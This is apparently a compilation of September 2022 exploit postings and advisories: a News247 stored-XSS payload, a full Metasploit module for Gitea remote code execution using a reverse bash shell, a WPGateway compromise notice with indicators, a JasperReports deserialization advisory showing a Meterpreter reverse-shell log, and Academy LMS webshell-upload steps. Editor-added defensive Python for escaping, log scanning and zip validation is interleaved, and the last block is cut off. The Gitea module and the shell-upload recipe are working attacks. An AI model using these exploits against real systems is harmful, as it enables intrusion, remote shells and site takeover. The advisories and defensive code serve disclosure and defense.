<pre><code># Exploit Title: News247 - News Magazine (CMS) v1.0 – Stored Cross Site Scripting (XSS) <br /># Exploit Author: Ravinder Verma <br /># Date: September 14, 2022 <br /># Vendor Homepage: https://www.sourcecodester.com/php/14952/news247-news-magazine-php-script.html <br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/news247.zip <br /># Tested on: Kali Linux, Apache, Mysql <br /># Vendor: 255programmer <br /># Version: v1.0 <br /># CVE [Reserved] : CVE-2021-41731 <br /># Exploit Description:<br /><br /># News247 - News Magazine (CMS) v1.0 suffers from a stored cross-site<br />scripting (XSS) vulnerability. An admin can publish blog posts under various<br />categories. When creating a new "blog category", an admin who enters a<br />malicious payload such as *""><img src=x onerror=alert(document.cookie)>*<br />into the category name field and then publishes a post in that category<br />causes arbitrary JavaScript to execute in the browser of every user who<br />visits that page. This can be abused to steal session cookies, perform<br />requests in the name of the victim, or for phishing attacks.<br /><br /></code></pre>
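Added example (editor's code, not the News247 source and not part of the advisory): the category-name payload quoted above rendered by a template that writes the name into an attribute and a text node unescaped, beside the same template with output encoding, and an HTML-parser check that counts the start tags a browser would see. The payload's leading `">` is what closes the attribute and lets the `<img>` element through. Only the payload comes from the advisory; the template markup and the helper names are assumptions.

```python
"""Added example, not code from the advisory or News247: the category-name
payload quoted above rendered by an unescaped template and by an escaped
one, with an HTML-parser check for the extra <img> element.  The template
markup is an assumption; only the payload comes from the advisory."""
import html
from html.parser import HTMLParser

# Payload quoted in the advisory.
PAYLOAD = '""><img src=x onerror=alert(document.cookie)>'


def render_category_vulnerable(name):
    """Category name written into an attribute and a text node unescaped,
    which is what a stored XSS in the category field amounts to."""
    return f'<option value="{name}">{name}</option>'


def render_category_fixed(name):
    """Same markup with html.escape(quote=True): the leading '"' can no
    longer close the attribute and '<' can no longer open a tag."""
    safe = html.escape(name, quote=True)
    return f'<option value="{safe}">{safe}</option>'


class _StartTags(HTMLParser):
    """Collect the start tags a tolerant HTML parser (like a browser) sees."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(markup):
    parser = _StartTags()
    parser.feed(markup)
    parser.close()
    return parser.tags


def injects_element(render, name, tag="img"):
    """True if rendering `name` with `render` produces a `tag` element
    that the template itself never emits."""
    return tag in start_tags(render(name))


if __name__ == "__main__":
    for render in (render_category_vulnerable, render_category_fixed):
        print(render.__name__, "->", start_tags(render(PAYLOAD)))
```

Escaping has to match the context the value lands in; `html.escape(quote=True)` covers HTML text and quoted attribute values, which is all this template uses, but a name written into a JavaScript string or an unquoted attribute needs a different encoder.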
<pre><code># Exploit Title: Gitea Git Fetch Remote Code Execution<br /># Date: 09/14/2022<br /># Exploit Author: samguy<br /># Vendor Homepage: https://gitea.io<br /># Software Link: https://dl.gitea.io/gitea/1.16.6<br /># Version: <= 1.16.6<br /># Tested on: Linux - Debian<br /># Ref : https://tttang.com/archive/1607/<br /># CVE : CVE-2022-30781<br /><br />##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Gitea Git Fetch Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits the git fetch command in the Gitea repository migration<br /> process, which leads to remote command execution on the system.<br /> This vulnerability affects Gitea versions before 1.16.7.<br /> },<br /> 'Author' => [<br /> 'wuhan005 & li4n0', # Original PoC<br /> 'krastanoel' # MSF Module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-30781'],<br /> ['URL', 'https://tttang.com/archive/1607/']<br /> ],<br /> 'DisclosureDate' => '2022-05-16',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => %w[unix win],<br /> 'Arch' => ARCH_CMD,<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> ],<br /> 'DefaultOptions' => { 'WfsDelay' => 30 },<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => []<br /> }<br /> )<br /> )<br /><br /> 
register_options([<br /> Opt::RPORT(3000),<br /> OptString.new('TARGETURI', [true, 'Base path', '/']),<br /> OptString.new('USERNAME', [true, 'Username to authenticate with']),<br /> OptString.new('PASSWORD', [true, 'Password to use']),<br /> OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait', 12])<br /> ])<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/user/login'),<br /> 'keep_cookies' => true<br /> )<br /> return CheckCode::Unknown('No response from the web service') if res.nil?<br /> return CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200<br /><br /> # Powered by Gitea Version: 1.16.6<br /> unless (match = res.body.match(/Gitea Version: (?<version>[\da-zA-Z.]+)/))<br /> return CheckCode::Unknown('Target does not appear to be running Gitea.')<br /> end<br /><br /> if match[:version].match(/[a-zA-Z]/)<br /> return CheckCode::Unknown("Unknown Gitea version #{match[:version]}.")<br /> end<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/user/login'),<br /> 'vars_post' => {<br /> 'user_name' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD'],<br /> '_csrf' => get_csrf(res.get_cookies)<br /> },<br /> 'keep_cookies' => true<br /> )<br /> return CheckCode::Safe('Authentication failed') if res&.code != 302<br /><br /> if Rex::Version.new(match[:version]) <= Rex::Version.new('1.16.6')<br /> return CheckCode::Appears("Version detected: #{match[:version]}")<br /> end<br /><br /> CheckCode::Safe("Version detected: #{match[:version]}")<br /> rescue ::Rex::ConnectionError<br /> return CheckCode::Unknown('Could not connect to the web service')<br /> end<br /><br /> def primer<br /> ['/api/v1/version', '/api/v1/settings/api',<br /> "/api/v1/repos/#{@migrate_repo_path}",<br /> "/api/v1/repos/#{@migrate_repo_path}/pulls",<br /> 
"/api/v1/repos/#{@migrate_repo_path}/topics"<br /> ].each { |uri| hardcoded_uripath(uri) } # adding resources<br /><br /> vprint_status("Creating repository \"#{@repo_name}\"")<br /> gitea_create_repo<br /> vprint_good('Repository created')<br /> vprint_status("Migrating repository")<br /> gitea_migrate_repo<br /> end<br /><br /> def exploit<br /> @repo_name = rand_text_alphanumeric(6..15)<br /> @migrate_repo_name = rand_text_alphanumeric(6..15)<br /> @migrate_repo_path = "#{datastore['username']}/#{@migrate_repo_name}"<br /> datastore['URIPATH'] = "/#{@migrate_repo_path}"<br /><br /> Timeout.timeout(datastore['HTTPDELAY']) { super }<br /> rescue Timeout::Error<br /> [@repo_name, @migrate_repo_name].map { |name| gitea_remove_repo(name) }<br /> cleanup # removing all resources<br /> end<br /><br /> def get_csrf(cookies)<br /> csrf = cookies&.split("; ")&.grep(/_csrf=/)&.join&.split("=")&.last<br /> fail_with(Failure::UnexpectedReply, 'Unable to get CSRF token') unless csrf<br /> csrf<br /> end<br /><br /> def gitea_remove_repo(name)<br /> vprint_status("Cleanup: removing repository \"#{name}\"")<br /> uri = "/#{datastore['username']}/#{name}/settings"<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, uri),<br /> 'keep_cookies' => true<br /> )<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => uri,<br /> 'vars_post' => {<br /> 'action' => 'delete',<br /> 'repo_name' => name,<br /> '_csrf' => get_csrf(res.get_cookies)<br /> },<br /> 'keep_cookies' => true<br /> )<br /> vprint_warning('Unable to remove repository') if res&.code != 302<br /> end<br /><br /> def gitea_create_repo<br /> uri = normalize_uri(target_uri.path, '/repo/create')<br /> res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => true)<br /> @uid = res&.get_html_document&.at('//input[@id="uid"]/@value')&.text<br /> fail_with(Failure::UnexpectedReply, 'Unable to get repo uid') unless @uid<br /><br /> res = 
send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => uri,<br /> 'vars_post' => {<br /> 'uid' => @uid,<br /> 'auto_init' => 'on',<br /> 'readme' => 'Default',<br /> 'repo_name' => @repo_name,<br /> 'trust_model' => 'default',<br /> 'default_branch' => 'master',<br /> '_csrf' => get_csrf(res.get_cookies)<br /> },<br /> 'keep_cookies' => true<br /> )<br /> fail_with(Failure::UnexpectedReply, 'Unable to create repo') if res&.code != 302<br /><br /> rescue ::Rex::ConnectionError<br /> return CheckCode::Unknown('Could not connect to the web service')<br /> end<br /><br /> def gitea_migrate_repo<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/repo/migrate'),<br /> 'keep_cookies' => true<br /> )<br /> uri = res&.get_html_document&.at('//svg[@class="svg gitea-gitea"]/ancestor::a/@href')&.text<br /> fail_with(Failure::UnexpectedReply, 'Unable to get Gitea service type') unless uri<br /><br /> svc_type = Rack::Utils.parse_query(URI.parse(uri).query)['service_type']<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, uri),<br /> 'keep_cookies' => true<br /> )<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => uri,<br /> 'vars_post' => {<br /> 'uid' => @uid,<br /> 'service' => svc_type,<br /> 'pull_requests' => 'on',<br /> 'repo_name' => @migrate_repo_name,<br /> '_csrf' => get_csrf(res.get_cookies),<br /> 'auth_token' => rand_text_alphanumeric(6..15),<br /> 'clone_addr' => "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}",<br /> },<br /> 'keep_cookies' => true<br /> )<br /> if res&.code != 302 # possibly triggered by the [migrations] settings<br /> err = res&.get_html_document&.at('//div[contains(@class, flash-error)]/p')&.text<br /> gitea_remove_repo(@repo_name)<br /> cleanup<br /> fail_with(Failure::UnexpectedReply, "Unable to migrate repo: #{err}")<br /> end<br /><br /> rescue ::Rex::ConnectionError<br /> return CheckCode::Unknown('Could 
not connect to the web service')<br /> end<br /><br /> def on_request_uri(cli, req)<br /> case req.uri<br /> when '/api/v1/version'<br /> send_response(cli, '{"version": "1.16.6"}')<br /> when '/api/v1/settings/api'<br /> data = {<br /> 'max_response_items':50,'default_paging_num':30,<br /> 'default_git_trees_per_page':1000,'default_max_blob_size':10485760<br /> }<br /> send_response(cli, data.to_json)<br /> when "/api/v1/repos/#{@migrate_repo_path}"<br /> data = {<br /> "clone_url": "#{full_uri}#{datastore['username']}/#{@repo_name}",<br /> "owner": { "login": datastore['username'] }<br /> }<br /> send_response(cli, data.to_json)<br /> when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1"<br /> send_response(cli, '{"topics":[]}')<br /> when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all"<br /> data = [<br /> {<br /> "base": {<br /> "ref": "master",<br /> },<br /> "head": {<br /> "ref": "--upload-pack=#{payload.encoded}",<br /> "repo": {<br /> "clone_url": "./",<br /> "owner": { "login": "master" },<br /> }<br /> },<br /> "updated_at": "2001-01-01T05:00:00+01:00",<br /> "user": {}<br /> }<br /> ]<br /> send_response(cli, data.to_json)<br /> end<br /> end<br />end<br /> <br /></code></pre>
<pre><code>Description: Unauthenticated Privilege Escalation<br /><br />Affected Plugin: WPGateway<br /><br />Plugin Slug: wpgateway<br /><br />Plugin Developer: Jack Hopman/WPGateway<br /><br />Affected Versions: <= 3.5<br /><br />CVE ID: CVE-2022-3180<br /><br />CVSS Score: 9.8 (Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />Fully Patched Version: N/A<br /><br />The WPGateway plugin is a premium plugin tied to the WPGateway cloud service, which offers its users a way to set up and manage WordPress sites from a single dashboard. Part of the plugin functionality exposes a vulnerability that allows unauthenticated attackers to insert a malicious administrator.<br /><br />We obtained a current copy of the plugin on September 9, 2022, and determined that it is vulnerable, at which time we contacted the plugin vendor with our initial disclosure. We have reserved vulnerability identifier CVE-2022-3180 for this issue.<br /><br />As this is an actively exploited zero-day vulnerability, and attackers are already aware of the mechanism required to exploit it, we are releasing this public service announcement (PSA) to all of our users. We are intentionally withholding certain details to prevent further exploitation. 
As a reminder, an attacker with administrator privileges has effectively achieved a complete site takeover.<br /><br />Indicators of compromise<br /><br />If you are working to determine whether a site has been compromised using this vulnerability, the most common indicator of compromise is a malicious administrator with the username of rangex.<br /><br />If you see this user added to your dashboard, it means that your site has been compromised.<br /><br />Additionally, you can check your site’s access logs for requests to //wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp_new_credentials=1<br /><br />If these requests are present in your logs, they indicate that your site has been attacked using an exploit targeting this vulnerability, but do not necessarily indicate that it has been successfully compromised.<br /><br />Conclusion<br /><br />In today’s post, we detailed a zero-day vulnerability being actively exploited in the WPGateway plugin.<br /><br />Wordfence Premium, Wordfence Care, and Wordfence Response customers received a firewall rule on September 8, 2022, protecting against this vulnerability, while sites still using the free version of Wordfence will receive the same protection 30 days later, on October 8, 2022.<br /><br />If you have the WPGateway plugin installed, we urge you to remove it immediately until a patch is made available and to check for malicious administrator users in your WordPress dashboard.<br /><br />If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected, as this is a serious vulnerability that is actively being exploited in the wild. Please help make the WordPress community aware of this issue.<br /><br />If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. 
If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.<br /><br />Our investigation is ongoing, and we will provide more information in an additional blog post when it becomes available.<br /><br />Special thanks to Threat Intelligence Lead Chloe Chamberland for spotting this exploit in the wild.<br /><br /></code></pre>
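The two indicators named in the PSA above, turned into a log and user-list check. This is an added example, not Wordfence's code; it assumes combined-format access logs and a (user_login, role) export from the site, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote

# Indicators named in the PSA above.
IOC_SCRIPT = "wp-content/plugins/wpgateway/wpgateway-webservice-new.php"
IOC_PARAM = "wp_new_credentials"
IOC_USERNAME = "rangex"

# Apache/nginx "combined" log format; only the fields reported are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)


def split_target(target):
    """Split a request target into (path, query dict). Percent-encoding is
    removed and runs of slashes collapsed, so the double-slash form quoted
    in the PSA and the plain /wp-content/... form compare equal."""
    path, _, query = target.partition("?")
    path = re.sub(r"/+", "/", unquote(path))
    return path, parse_qs(query, keep_blank_values=True)


def is_exploit_request(target):
    """True when the target reaches the webservice script with
    wp_new_credentials=1, whatever other parameters are present."""
    path, query = split_target(target)
    return path.endswith("/" + IOC_SCRIPT) and query.get(IOC_PARAM) == ["1"]


def scan_access_log(lines):
    """One finding per matching request. The status code is kept because,
    as the PSA says, the request alone shows an attack attempt rather than
    a successful compromise; a 200 deserves the closer look, a 404 less so."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_exploit_request(m.group("target")):
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "status": int(m.group("status")),
                             "target": m.group("target")})
    return findings


def find_rogue_accounts(users):
    """users: iterable of (user_login, role) pairs exported from WordPress.
    Every account named rangex is returned with its role, since an
    administrator by that name is the PSA's primary indicator."""
    return [(login, role) for login, role in users
            if login.lower() == IOC_USERNAME]


# Constructed sample data for the demonstration, not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Sep/2022:03:14:07 +0000] "GET //wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp_new_credentials=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Sep/2022:03:14:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Sep/2022:03:15:00 +0000] "GET /wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp_new_credentials=1 HTTP/1.1" 404 0 "-" "curl/7.81.0"',
    '192.0.2.4 - - [10/Sep/2022:03:16:00 +0000] "GET /wp-content/plugins/wpgateway/wpgateway-webservice-new.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
]
SAMPLE_USERS = [("admin", "administrator"), ("editor1", "editor"),
                ("rangex", "administrator")]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print("attempt from %(ip)s at %(ts)s, HTTP %(status)d" % f)
    for login, role in find_rogue_accounts(SAMPLE_USERS):
        print("rogue account %r with role %s" % (login, role))
```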
<pre><code>Advisory ID: SYSS-2022-041<br />Product: JasperReports Server<br />Manufacturer: TIBCO Software Inc.<br />Tested Version(s): 8.0.2 Community Edition<br />Vulnerability Type: CWE-502: Deserialization of Untrusted Data<br />Risk Level: High<br />Solution Status: Fixed<br />Manufacturer Notification: 2022-06-10<br />Solution Date: 2022-08-10<br />Public Disclosure: 2022-09-09<br />CVE Reference: None assigned<br />Author of Advisory: Moritz Bechler, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"TIBCO JasperReports(R) Server is a stand-alone and embeddable<br />reporting server. It provides reporting and analytics that can<br />be embedded into a web or mobile application as well as operate<br />as a central information hub for the enterprise by delivering<br />mission critical information on a real-time or scheduled basis<br />to the browser, mobile device, or email inbox in a variety of<br />file formats."<br /><br />Due to JMX/RMI services performing unsafe deserialization, it is<br />possible to execute arbitrary code and system commands on the<br />server system.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The JasperReports Server web application spawns a non-standard JMX<br />diagnostic server exposed under the RMI name "jasperserver". 
The relevant<br />configuration is found in WEB-INF/js.diagnostic.properties:<br />------<br />#Diagnostic default remote access configuration<br />diagnostic.usePlatformJMXServer = false<br />diagnostic.port = 10990<br />diagnostic.name = jasperserver<br />diagnostic.rmiHost = localhost<br />------<br /><br />It is also found in WEB-INF/applicationContext-diagnostic.xml:<br />------<br /><!--Bean which create Connector to JMS Servercan be disabled if not Using separate JMX Server--><br /><bean id="jasperJMXServerConnector" class="org.springframework.jmx.support.ConnectorServerFactoryBean" lazy-init="false"><br /> <property name="server" ref="jasperJMXServer"/><br /> <property name="objectName" value="connector:name=rmi"/><br /> <property name="serviceUrl" value="service:jmx:rmi:///jndi/rmi://${diagnostic.rmiHost}:${diagnostic.port}/${diagnostic.name}"/><br /> <property name="environmentMap"><br /> <map><br /> <entry key="jmx.remote.authenticator" value-ref="jMXAuthenticator"/><br /> </map><br /> </property><br /></bean><br />------<br /><br /><br />While the hostname for the RMI bind is specified as localhost, this does,<br />in fact, not set the bind address and both the registry and the<br />(random) object port are reachable over the network. Only the returned<br />reference address is broken, as it points to the local address, but<br />this can be adjusted for exploitation.<br /><br />And while various security patches have implemented type restrictions<br />for the fundamental RMI services (DGC, Registry) and the JMX authentication,<br />the latter is not applied in this case. 
It is only active if the following<br />property is set: "jmx.remote.rmi.server.credential.types".<br /><br />For a regular JMX server, this is configured by the standard<br />library's JMX ConnectorBootstrap; however, this is not the case for the custom<br />JMX server created through Spring's ConnectorServerFactoryBean.<br /><br />Therefore, the RMIServer.newClient endpoint performs unrestricted,<br />unsafe deserialization and can be exploited using one of the known,<br />published gadget chains (e.g. from ysoserial[5]) in one of the libraries<br />bundled by the server. These allow for execution of arbitrary bytecode and/or<br />system commands on the server.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />JasperReports Server (CE) was installed according to the documentation[4]<br />on a Debian 11 system running Tomcat 9.0.43-2~deb11u3 and OpenJDK 11.0.15.<br /><br />After the successful initial setup, a new RMI service can be observed on TCP<br />port 10990:<br /><br />------<br />PORT STATE SERVICE VERSION<br />10990/tcp open java-rmi Java RMI<br />| rmi-dumpregistry:<br />| jasperserver<br />| javax.management.remote.rmi.RMIServerImpl_Stub<br />| @127.0.1.1:39297<br />| extends<br />| java.rmi.server.RemoteStub<br />| extends<br />|_ java.rmi.server.RemoteObject<br />------<br /><br />Using a custom Metasploit module, calls on the exposed RMI object can<br />be made (calling JMX's RMIServer.newClient(Object creds)). The module<br />is capable of identifying known exploitable types on the remote classpath<br />and sending malicious crafted objects. 
These, when deserialized by the remote<br />RMI server, spawn a Java Meterpreter instance and open a reverse shell.<br /><br />------<br />msf6 exploit(multi/java/rmi_server) ><br />[*] Started reverse TCP handler on 192.168.56.1:4444<br />[*] payload/java/classfile/meterpreter/reverse_tcp<br />[*] Trying bytecode execution<br />[*] Found RMI Registry with 1 registered objects<br />[+] Registry lookup() name argument is filtered<br />[*] Bind access check before deserialization<br />[*] DGC found<br />[+] DGC filters parameter types<br />[*] Found 1 referenced objects, following references<br />[*] Custom object found jasperserver<br />[*] Trying with original host 192.168.56.106 port 39297<br />[*] Method/interface hash -1089742558549201240 method id -1<br />[*] Initial test returned error java.lang.SecurityException<br />[-] Incompatible commons-fileupload<br />[*] Identified 1 attack vector(s), gadgets ["hashdos", "beanutils",<br /> "hibernate", "hibernate-validator", "spring-typeprov", "spring-jta", "rhino"]<br />[*] Skipping gadget hashdos based on config<br />[*] Sending stage (53921 bytes) to 192.168.56.106<br />[...]<br />[*] Waiting for exploit to complete...<br />[*] Have session...<br />[*] Server stopped.<br />[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.106:46828) at 2022-06-09 13:39:40 +0200<br />------<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Disable the JMX server as described in section 9.12 of the Administrator Guide [6].<br />Update to version 8.1.0, which disables the JMX service by default.<br />Do not enable the Diagnostic JMX Server.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2022-06-08: Vulnerability discovered<br />2022-06-10: Vulnerability reported to manufacturer<br />2022-08-10: Patch released by manufacturer<br />2022-09-09: Public disclosure of vulnerability<br
/><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for JasperReports Server<br /> https://community.jaspersoft.com/project/jasperreports-server<br />[2] SySS Security Advisory SYSS-2022-041<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-041.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] TIBCO JasperReports Server Community Edition Release Notes<br /> https://community.jaspersoft.com/documentation/tibco-jasperreports-server-community-edition-release-notes/v750/installation-and-basic<br />[5] ysoserial<br /> https://github.com/frohoff/ysoserial/<br />[6] JasperReports Server Administrator Guide<br /> https://docs.tibco.com/pub/js-jrs/8.0.2/doc/pdf/TIB_js-jrs_8.0.0_Admin-Guide.pdf?id=5<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Bechler of SySS GmbH.<br /><br />E-Mail: moritz.bechler@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc<br />Key ID: 0x768EFE2BB3E53DDA<br />Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code># Exploit Title: Academy Learning Management System 5.7 Shell Upload<br /># Exploit Author: th3d1gger<br /># Vendor Homepage: https://codecanyon.net<br /># Software Link: https://codecanyon.net/item/academy-course-based-learning-management-system/22703468<br /># Version: 5.7<br /># Tested on Ubuntu 18.04<br /><br />The architecture for uploading zip files during addon install is totally wrong.<br /><br />---Vulnerable Source Code ---<br />$zipped_file_name = $_FILES['addon_zip']['name'];<br /><br />if (!empty($zipped_file_name)) {<br />    // Create update directory.<br />    $dir = 'uploads/addons';<br />    if (!is_dir($dir))<br />        mkdir($dir, 0777, true);<br /><br />    $path = "uploads/addons/".$zipped_file_name;<br />    if (class_exists('ZipArchive')) {<br />        move_uploaded_file($_FILES['addon_zip']['tmp_name'], $path);<br />        //Unzip uploaded update file and remove zip file.<br />        // The archive entries (names, paths, file types) are never checked before extraction.<br />        $zip = new ZipArchive;<br />        $zip->open($path);<br />        $zip->extractTo('uploads/addons');<br />        $zip->close();<br />        unlink($path);<br />    }else{<br />        $this->session->set_flashdata('error_message', get_phrase('your_server_is_unable_to_extract_the_zip_file').'. '.get_phrase('please_enable_the_zip_extension_on_your_server').', '.get_phrase('then_try_again'));<br />        redirect(site_url('admin/addon'), 'refresh');<br />    }<br />}<br /><br />---Exploit------<br />Send a GET request to the route "/admin/addon/add" in the admin panel.<br /><br />Then, for example, download a nulled version of the "certificate addon".<br /><br />In the addon's config.json file, add:<br />"""<br />    {<br />        "root_directory" : "uploads/addons/certificate/others/shell.php",<br />        "update_directory" : "uploads/certificates/shell.php"<br />    },<br />"""<br /><br />Add your webshell to the "others" folder of the addon.<br /><br />Click the "install addon" button.<br /><br />And ta daa !<br />->Send a GET request to https://your-url/uploads/certificates/shell.php<br /></code></pre>
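The check the quoted install code lacks, written as a pre-extraction validator. This is an added Python illustration, not the exploit's or Academy LMS's (PHP) code; it assumes config.json is a JSON array of root_directory/update_directory objects as in the fragment above, and the extension allowlist is an assumption.

```python
import io
import json
import posixpath
import zipfile

ADDON_ROOT = "uploads/addons"   # where the installer extracts the archive
UPLOAD_ROOT = "uploads"         # where config.json mappings may copy files
# Assumed allowlist of what an addon may ship or install; anything the web
# server could execute, and .htaccess, is refused before extraction.
ALLOWED_EXT = {".json", ".css", ".js", ".png", ".jpg", ".svg", ".html", ".txt"}
EXECUTABLE_EXT = {".php", ".phtml", ".phar", ".htaccess"}

def within(path, base):
    """True if path is relative and, once normalised, stays inside base."""
    if not path or path.startswith(("/", "\\")) or ":" in path:
        return False
    norm = posixpath.normpath(path.replace("\\", "/"))
    return norm == base or norm.startswith(base + "/")

def file_type_error(path):
    """The last extension must be allowed and no earlier one executable,
    so shell.php, shell.php.png and .htaccess are all refused."""
    exts = ["." + p.lower() for p in posixpath.basename(path).split(".")[1:]]
    if (not exts or exts[-1] not in ALLOWED_EXT
            or any(e in EXECUTABLE_EXT for e in exts)):
        return "disallowed file type: %s" % path
    return None

def check_mappings(mappings, shipped):
    """Assumes config.json is a JSON array of objects as in the fragment
    above: root_directory must name a file the archive ships, update_directory
    must stay under uploads/, and both must be allowed file types."""
    if not isinstance(mappings, list):
        return ["config.json: expected a list of mappings"]
    problems = []
    for m in mappings:
        if not isinstance(m, dict):
            continue
        src = str(m.get("root_directory", ""))
        dst = str(m.get("update_directory", ""))
        if posixpath.normpath(src) not in shipped:
            problems.append("root_directory not shipped by the addon: %s" % src)
        if not within(dst, UPLOAD_ROOT):
            problems.append("update_directory escapes %s: %s" % (UPLOAD_ROOT, dst))
        problems.extend(e for e in (file_type_error(src), file_type_error(dst)) if e)
    return problems

def validate_addon(zip_bytes):
    """Return the problems found in the archive; extract only if it is empty."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
        shipped = set()
        for name in names:
            dest = posixpath.join(ADDON_ROOT, name)
            if not within(dest, ADDON_ROOT):
                problems.append("entry escapes %s: %s" % (ADDON_ROOT, name))
                continue
            if name.endswith("/"):
                continue  # directory entry
            err = file_type_error(name)
            if err:
                problems.append(err)
            shipped.add(posixpath.normpath(dest))
        for name in names:
            if posixpath.basename(name) == "config.json":
                try:
                    problems.extend(check_mappings(json.loads(zf.read(name)), shipped))
                except ValueError:
                    problems.append("%s is not valid JSON" % name)
    return problems

def build_zip(files):
    """Constructed in-memory archive for the demonstration."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()

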